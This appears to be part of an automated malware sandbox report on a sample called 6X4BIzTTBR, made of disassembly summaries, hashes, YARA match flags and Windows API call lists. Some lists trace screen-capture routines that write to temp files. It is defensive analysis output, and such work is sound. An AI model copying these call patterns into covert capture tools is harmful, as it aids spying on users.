                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast$EnumLocalesSystem_free
                                                      • String ID:
                                                      • API String ID: 2016158738-0
                                                      • Opcode ID: f8127ac3abd046b9e22886f4815e390275be4e8c9be1d23358ed75c1eff5e80b
                                                      • Instruction ID: 52425d4f4bda8d81f1ae43ee9f2c6dc22e7d3584ecd4c25c01c1302a8358c51d
                                                      • Opcode Fuzzy Hash: f8127ac3abd046b9e22886f4815e390275be4e8c9be1d23358ed75c1eff5e80b
                                                      • Instruction Fuzzy Hash: EEF0E53A30020597CB149F79DC5976ABFD4EFC1754B1A8099EF09CB390D675EA42C790
                                                      APIs
                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_00010682,0040FC0F), ref: 0041067B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled
                                                      • String ID:
                                                      • API String ID: 3192549508-0
                                                      • Opcode ID: bf6d707dc8b2c41b2a5ab4993f9389fcf0fb9c2c59ac606d679ed392ef9fb769
                                                      • Instruction ID: c9cfcfeb60a121424c750bde0cb178890b8b3ed73da33a3507a234e3df48861c
                                                      • Opcode Fuzzy Hash: bf6d707dc8b2c41b2a5ab4993f9389fcf0fb9c2c59ac606d679ed392ef9fb769
                                                      • Instruction Fuzzy Hash:
                                                      APIs
                                                      • SetUnhandledExceptionFilter.KERNEL32(00410682,046DFE76), ref: 046E08E2
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled
                                                      • String ID:
                                                      • API String ID: 3192549508-0
                                                      • Opcode ID: bf6d707dc8b2c41b2a5ab4993f9389fcf0fb9c2c59ac606d679ed392ef9fb769
                                                      • Instruction ID: c9cfcfeb60a121424c750bde0cb178890b8b3ed73da33a3507a234e3df48861c
                                                      • Opcode Fuzzy Hash: bf6d707dc8b2c41b2a5ab4993f9389fcf0fb9c2c59ac606d679ed392ef9fb769
                                                      • Instruction Fuzzy Hash:
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: HeapProcess
                                                      • String ID:
                                                      • API String ID: 54951025-0
                                                      • Opcode ID: b4ea6d87a370488c09fcd641e95d7d939a449e6ed78a54530fece2258cf524d5
                                                      • Instruction ID: 646215492ee1b006629ac518ce4a11708067c45d14fae9e363609ac2be79142b
                                                      • Opcode Fuzzy Hash: b4ea6d87a370488c09fcd641e95d7d939a449e6ed78a54530fece2258cf524d5
                                                      • Instruction Fuzzy Hash: 3FA02230A00300EF8380CF30AE0830E3BE8BE03AC3B008238A002C3030EB30C0808B08
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 833578221895711969fd992aca003b8dff0ac6b0b4e24d9bd8e499997b964946
                                                      • Instruction ID: 85c012ed53081dc1eef79cc2ce32c7123eff4ec8b0cf65c947085ef3536d5db3
                                                      • Opcode Fuzzy Hash: 833578221895711969fd992aca003b8dff0ac6b0b4e24d9bd8e499997b964946
                                                      • Instruction Fuzzy Hash: FB324662D68F014DE7339634C822336A298EFBB3D4F15E737E859B5AA5EB2CC5834105
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e4791b4cce090e14dc8513036a2715920b1b30530ae8684d3ebf23ce663880f9
                                                      • Instruction ID: e89f1022fef3ce9bb4d928cc7a4c417241da36143efff2f590400b5932f12147
                                                      • Opcode Fuzzy Hash: e4791b4cce090e14dc8513036a2715920b1b30530ae8684d3ebf23ce663880f9
                                                      • Instruction Fuzzy Hash: 49E18270A08616EFD714CF24C590AAAB7F1FF44304B24457EE442ABB91D738F861DB96
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 978a5e910df1d0a01caf20267dfbf1e5fc0c4253ee9a873c4d519ef481566b0c
                                                      • Instruction ID: 5bcafac6d4ba85f8fdfe7b6865c77a6d58738a873cb9f077e8fcf15e7ab673dc
                                                      • Opcode Fuzzy Hash: 978a5e910df1d0a01caf20267dfbf1e5fc0c4253ee9a873c4d519ef481566b0c
                                                      • Instruction Fuzzy Hash: 0CD1BA322085A34AC76D4A3D8C7003ABFE16B5226330D479ED5F7CB6C6FA24F555D660
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                      • Instruction ID: d4b045119732f6c4b61e089dfd53f5141c77cb00d8d562454f7e7704be034b71
                                                      • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                      • Instruction Fuzzy Hash: 8A91857230D0B349DB294639957503FFFE15A923A139B079FE4F2CA2C1EE289954D724
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                      • Instruction ID: 7ae10e90a52f2e8190301cace3a2fb258bc264298b4b93db1370c53cf3370fc3
                                                      • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                      • Instruction Fuzzy Hash: 059175722080A34ADB2A567E8C7403EFFE15A522A131A17DED5F2CB2C5FF24E165D630
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                      • Instruction ID: 289313d67c0a3111a55c2123911b3337c50b3c3cf8115783772010cb944f3c5d
                                                      • Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                      • Instruction Fuzzy Hash: E391967230A0B349EB69427A953403FFFE15A923A135E07DFD4F2CB2C5EE288565D624
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                      • Instruction ID: 99056211728759f55da35279fe5510c5cb7c544982d766b6d5a9461978e544d3
                                                      • Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                      • Instruction Fuzzy Hash: 5F9194732081A30ADB6A567D8C7403EFFE15A522A130A17DED5F2CB2C5FF24E554E620
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                      • Instruction ID: 96852df962a60768f3281df12c15312d75bd71a5577a0c3123a4a78a8715bc99
                                                      • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                      • Instruction Fuzzy Hash: AF91637230D0B34ADB2E463AA47403FFFE15A923A539A079FD4F2CA2C1ED18D655D624
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                      • Instruction ID: 0fdcbc21c84d8a41f3edd5014ea6aea6b77d740449736b3352117f4e82f4471b
                                                      • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                      • Instruction Fuzzy Hash: 269154722090A30ADB6E463D8D7403EFFE15B522A331A17AFD5F2CA2C5FE24E554D620
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fc31d320c795f004d24ba8341ded4eebeb73840abc836b894b4ba362e903035c
                                                      • Instruction ID: 18c1aaddf8e31a418027ff40844c51ed70492bcdf6650b712559b4554c0e38a2
                                                      • Opcode Fuzzy Hash: fc31d320c795f004d24ba8341ded4eebeb73840abc836b894b4ba362e903035c
                                                      • Instruction Fuzzy Hash: BD6144B1F0063876DA389A2CB895BBF23949F41748FE0051BE446DB381D69DDD82C64E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f064d261a6db162a18988518e6412387d7217a2fbe5ef33d199751ee8f38446f
                                                      • Instruction ID: 7b8f1cd0fbcf866872d83eff3452a2bd58ee1462703e5eff87a62bbdf729000e
                                                      • Opcode Fuzzy Hash: f064d261a6db162a18988518e6412387d7217a2fbe5ef33d199751ee8f38446f
                                                      • Instruction Fuzzy Hash: E3614971700B0866EB346A688C95BBE7395AF61B08F84051EDBD3DF7C0F616F9428359
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                      • Instruction ID: eb18823bf6c30dc543e1166231bbc17f0f2db483a807da6279e59b8cf65918ce
                                                      • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                      • Instruction Fuzzy Hash: 1D81767230D0B34AEB694239957843FFFE15A923A135A079FD4F2CA2C1ED288654D724
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                      • Instruction ID: f747cee806100c10cfbe0eccfe513596cb2b3fa908a4046c626276a9a219c633
                                                      • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                      • Instruction Fuzzy Hash: 9A8155722090A34EDB2E4A398C7443EFFE15B522A331A179ED5F2CA2C5FD24E165D620
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                      • Instruction ID: e424a7d7687463a037108835ac45f21073ba03c709bb761916e79cfb3ae354be
                                                      • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                      • Instruction Fuzzy Hash: 5311387730307253D604862DF8B46BFA395EBD53207ED427FC0428B748DA2AE9C19908
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                      • Instruction ID: 503392b29af586815fe977f013ed040b2a6932679ea943dc9dbb3a3131701715
                                                      • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                      • Instruction Fuzzy Hash: 83113B773010414797149A2ECCB41BAA795EBE63A07AC42F9C3E24B358F322F541D500
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091760416.0000000002C0D000.00000040.00000020.00020000.00000000.sdmp, Offset: 02C0D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2c0d000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                      • Instruction ID: f7a652430ea48b51488ca4aadfc73871e9ec570b83cb0740f85c35021d2872cc
                                                      • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                      • Instruction Fuzzy Hash: C9118E72384100AFDB44DF96DCC0FA673EAEB88270B198065ED06CB356D775E842CB60
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                      • Instruction ID: e3089ebc58c46d0fd9d889f689c064b6f9a91c99362cae92cf21caf02abb4adc
                                                      • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                      • Instruction Fuzzy Hash: 3101A776E006048FDF21CF24C804BAA33F5EB85219F4544AAE50797342F774B9418B90
                                                      APIs
                                                      • DefWindowProcW.USER32(?,00000014,?,?), ref: 00402142
                                                      • GetClientRect.USER32(?,?), ref: 00402157
                                                      • GetDC.USER32(?), ref: 0040215E
                                                      • CreateSolidBrush.GDI32(00646464), ref: 00402171
                                                      • SelectObject.GDI32(00000000,00000000), ref: 00402185
                                                      • CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 00402190
                                                      • SelectObject.GDI32(00000000,00000000), ref: 0040219E
                                                      • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 004021B1
                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004021BC
                                                      • MulDiv.KERNEL32(00000008,00000000), ref: 004021C5
                                                      • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,Tahoma), ref: 004021E9
                                                      • SelectObject.GDI32(00000000,00000000), ref: 004021F7
                                                      • SetBkMode.GDI32(?,00000001), ref: 00402274
                                                      • SetTextColor.GDI32(?,00000000), ref: 00402283
                                                      • _wcslen.LIBCMT ref: 0040228C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: CreateObjectSelect$BrushCapsClientColorDeviceFontModeProcRectRectangleSolidTextWindow_wcslen
                                                      • String ID: Tahoma
                                                      • API String ID: 3832963559-3580928618
                                                      • Opcode ID: 815c4a87b7b94f2fc3b2348d308f3a6303f78e2cacf9c8be4fdb62532196feef
                                                      • Instruction ID: 1492cd055d75f4dcf8d6c492afaf364a2e49ccf6844f45952de134af76b70ab5
                                                      • Opcode Fuzzy Hash: 815c4a87b7b94f2fc3b2348d308f3a6303f78e2cacf9c8be4fdb62532196feef
                                                      • Instruction Fuzzy Hash: 1171FF72900228AFDB22DF64DD85FAEBBBCEB09751F0041A5B609E6155DA74AF80CF14
                                                      APIs
                                                      • DestroyWindow.USER32(?), ref: 004025DE
                                                      • DefWindowProcW.USER32(?,00000204,?,?), ref: 004025F0
                                                      • ReleaseCapture.USER32 ref: 00402603
                                                      • GetDC.USER32(00000000), ref: 0040262A
                                                      • CreateCompatibleBitmap.GDI32(?,-0045D5E7,00000001), ref: 004026B1
                                                      • CreateCompatibleDC.GDI32(?), ref: 004026BA
                                                      • SelectObject.GDI32(00000000,00000000), ref: 004026C4
                                                      • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00CC0020), ref: 004026F2
                                                      • ShowWindow.USER32(?,00000000), ref: 004026FB
                                                      • GetTempPathW.KERNEL32(00000104,?), ref: 0040270D
                                                      • GetTempFileNameW.KERNEL32(?,gya,00000000,?), ref: 00402728
                                                      • DeleteFileW.KERNEL32(?), ref: 00402742
                                                      • DeleteDC.GDI32(00000000), ref: 00402749
                                                      • DeleteObject.GDI32(00000000), ref: 00402750
                                                      • ReleaseDC.USER32(00000000,?), ref: 0040275E
                                                      • DestroyWindow.USER32(?), ref: 00402765
                                                      • SetCapture.USER32(?), ref: 004027B2
                                                      • GetDC.USER32(00000000), ref: 004027E6
                                                      • ReleaseDC.USER32(00000000,00000000), ref: 004027FC
                                                      • GetKeyState.USER32(0000001B), ref: 00402809
                                                      • DestroyWindow.USER32(?), ref: 0040281E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: Window$DeleteDestroyRelease$CaptureCompatibleCreateFileObjectTemp$BitmapNamePathProcSelectShowState
                                                      • String ID: gya
                                                      • API String ID: 2545303185-1989253062
                                                      • Opcode ID: 5a8c514e44ded35b0adfbcc0c63d93990d9580e4b737f33107eb22fc96166e5b
                                                      • Instruction ID: d31b96895c31ceb89adb1611ca46d69af71d1c98fc3259fe66be75f044b8c494
                                                      • Opcode Fuzzy Hash: 5a8c514e44ded35b0adfbcc0c63d93990d9580e4b737f33107eb22fc96166e5b
                                                      • Instruction Fuzzy Hash: 086193B5900209AFCB28AF64DD48FA97BB5FF49706F044179F605E22A2D778CA41CB1C
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: _free$Info
                                                      • String ID:
                                                      • API String ID: 2509303402-0
                                                      • Opcode ID: 3c8bd96b14d453fc78fbdfa0c935f0ea1f368fed7a7b63a3d2dca3ea6bd9dcea
                                                      • Instruction ID: 0563f902f2d29fd0dd5527abd6fb3472a23659a2d418bea713265d38096b261b
                                                      • Opcode Fuzzy Hash: 3c8bd96b14d453fc78fbdfa0c935f0ea1f368fed7a7b63a3d2dca3ea6bd9dcea
                                                      • Instruction Fuzzy Hash: B6B1AEB1A002059EDB21DF66D881BEEBBB4FF08304F54446FF995A7342D67AA941CB24
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$Info
                                                      • String ID:
                                                      • API String ID: 2509303402-0
                                                      • Opcode ID: 17cc7d2981949aec261f5402442bc47708264f4dc272fa138ea10e652b727814
                                                      • Instruction ID: 88f01f5f0b15a8ce2b41d80f45de304f00f268257d2efb3de5444131e72d6ab1
                                                      • Opcode Fuzzy Hash: 17cc7d2981949aec261f5402442bc47708264f4dc272fa138ea10e652b727814
                                                      • Instruction Fuzzy Hash: 0AB1BEB1901205DFEB219F69CC80BEEBBF5BF09308F144169E995A7391E736A8459B20
                                                      APIs
                                                      • ___free_lconv_mon.LIBCMT ref: 0043A64C
                                                        • Part of subcall function 0043999B: _free.LIBCMT ref: 004399B8
                                                        • Part of subcall function 0043999B: _free.LIBCMT ref: 004399CA
                                                        • Part of subcall function 0043999B: _free.LIBCMT ref: 004399DC
                                                        • Part of subcall function 0043999B: _free.LIBCMT ref: 004399EE
                                                        • Part of subcall function 0043999B: _free.LIBCMT ref: 00439A00
                                                        • Part of subcall function 0043999B: _free.LIBCMT ref: 00439A12
                                                        • Part of subcall function 0043999B: _free.LIBCMT ref: 00439A24
                                                        • Part of subcall function 0043999B: _free.LIBCMT ref: 00439A36
                                                        • Part of subcall function 0043999B: _free.LIBCMT ref: 00439A48
                                                        • Part of subcall function 0043999B: _free.LIBCMT ref: 00439A5A
                                                        • Part of subcall function 0043999B: _free.LIBCMT ref: 00439A6C
                                                        • Part of subcall function 0043999B: _free.LIBCMT ref: 00439A7E
                                                        • Part of subcall function 0043999B: _free.LIBCMT ref: 00439A90
                                                      • _free.LIBCMT ref: 0043A641
                                                        • Part of subcall function 0043347A: RtlFreeHeap.NTDLL(00000000,00000000,?,0043A108,?,00000000,?,00000000,?,0043A3AC,?,00000007,?,?,0043A7A0,?), ref: 00433490
                                                        • Part of subcall function 0043347A: GetLastError.KERNEL32(?,?,0043A108,?,00000000,?,00000000,?,0043A3AC,?,00000007,?,?,0043A7A0,?,?), ref: 004334A2
                                                      • _free.LIBCMT ref: 0043A663
                                                      • _free.LIBCMT ref: 0043A678
                                                      • _free.LIBCMT ref: 0043A683
                                                      • _free.LIBCMT ref: 0043A6A5
                                                      • _free.LIBCMT ref: 0043A6B8
                                                      • _free.LIBCMT ref: 0043A6C6
                                                      • _free.LIBCMT ref: 0043A6D1
                                                      • _free.LIBCMT ref: 0043A709
                                                      • _free.LIBCMT ref: 0043A710
                                                      • _free.LIBCMT ref: 0043A72D
                                                      • _free.LIBCMT ref: 0043A745
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                      • String ID:
                                                      • API String ID: 161543041-0
                                                      • Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                      • Instruction ID: 043ee058ae0440c8c6be1a9be8146c9f0871b0b64c066d2b7e4cd08506a5a284
                                                      • Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                      • Instruction Fuzzy Hash: F9315B315002009FEB319B3AD846B5777E8EB18315F14A42FE4E9C6291DB3AED608B1A
                                                      APIs
                                                      • ___free_lconv_mon.LIBCMT ref: 0470A8B3
                                                        • Part of subcall function 04709C02: _free.LIBCMT ref: 04709C1F
                                                        • Part of subcall function 04709C02: _free.LIBCMT ref: 04709C31
                                                        • Part of subcall function 04709C02: _free.LIBCMT ref: 04709C43
                                                        • Part of subcall function 04709C02: _free.LIBCMT ref: 04709C55
                                                        • Part of subcall function 04709C02: _free.LIBCMT ref: 04709C67
                                                        • Part of subcall function 04709C02: _free.LIBCMT ref: 04709C79
                                                        • Part of subcall function 04709C02: _free.LIBCMT ref: 04709C8B
                                                        • Part of subcall function 04709C02: _free.LIBCMT ref: 04709C9D
                                                        • Part of subcall function 04709C02: _free.LIBCMT ref: 04709CAF
                                                        • Part of subcall function 04709C02: _free.LIBCMT ref: 04709CC1
                                                        • Part of subcall function 04709C02: _free.LIBCMT ref: 04709CD3
                                                        • Part of subcall function 04709C02: _free.LIBCMT ref: 04709CE5
                                                        • Part of subcall function 04709C02: _free.LIBCMT ref: 04709CF7
                                                      • _free.LIBCMT ref: 0470A8A8
                                                        • Part of subcall function 047036E1: HeapFree.KERNEL32(00000000,00000000,?,0470A36F,?,00000000,?,00000000,?,0470A613,?,00000007,?,?,0470AA07,?), ref: 047036F7
                                                        • Part of subcall function 047036E1: GetLastError.KERNEL32(?,?,0470A36F,?,00000000,?,00000000,?,0470A613,?,00000007,?,?,0470AA07,?,?), ref: 04703709
                                                      • _free.LIBCMT ref: 0470A8CA
                                                      • _free.LIBCMT ref: 0470A8DF
                                                      • _free.LIBCMT ref: 0470A8EA
                                                      • _free.LIBCMT ref: 0470A90C
                                                      • _free.LIBCMT ref: 0470A91F
                                                      • _free.LIBCMT ref: 0470A92D
                                                      • _free.LIBCMT ref: 0470A938
                                                      • _free.LIBCMT ref: 0470A970
                                                      • _free.LIBCMT ref: 0470A977
                                                      • _free.LIBCMT ref: 0470A994
                                                      • _free.LIBCMT ref: 0470A9AC
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                      • String ID:
                                                      • API String ID: 161543041-0
                                                      • Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                      • Instruction ID: 12c28b19e66dc0296096a4f3a46065d8a30247c9e3738b5069a42c295ca65a70
                                                      • Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                      • Instruction Fuzzy Hash: C0315A71602301DFEB31AB78D848B5AB3E9AF11318F10C629E849D73D0DA36B895DB24
                                                      APIs
